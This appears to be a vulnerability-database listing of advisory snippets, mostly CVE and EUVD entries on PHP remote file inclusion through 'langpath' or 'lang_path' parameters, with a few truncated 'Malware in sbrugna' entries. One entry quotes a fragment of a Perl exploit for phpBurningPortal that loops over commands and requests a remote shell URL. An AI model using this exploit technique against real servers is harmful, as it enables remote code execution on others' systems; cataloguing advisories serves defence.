EUVD-2006-7084

Malware in sbrugna...

EUVD-2010-4878

Malware in sbrugna...

EUVD-2005-2199

Malware in sbrugna...

CVE-2021-34551

PHPMailer before 6.5.0 on Windows allows remote code execution if langpath is untrusted data and has a UNC pathname...

Remote file inclusion

PHP remote file inclusion vulnerability in tools/phpmailer/class.phpmailer.php in PHP Classifieds 7.3 allows remote attackers to execute arbitrary PHP code via a URL in the langpath parameter...

CVE-2007-2255

Multiple PHP remote file inclusion vulnerabilities in Download-Engine 1.4.3 allow remote attackers to execute arbitrary PHP code via a URL in the 1 engdir parameter to addmember.php, 2 langpath parameter to admin/enginelib/class.phpmailer.php, and the 3 spawroot parameter to...

phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit

Exploit for unknown platform in category web applications ================================================================= phpBurningPortal ; while $cmd ! "exit" $xpl = LWP::UserAgent-new or die; $req = HTTP::Request-newGET=$target'/modules/includes/'.$file.$shellsite.'?&'.$shellcmd.'='.$cmd or...

CVE-2005-2198

SPiD (a PHP-based photo gallery) is affected by CVE-2005-2198 due to a remote file inclusion vulnerability in lang.php. The flaw allows an attacker to influence the lang_path parameter to include PHP code from an attacker-controlled location, enabling arbitrary code execution and potential disclo...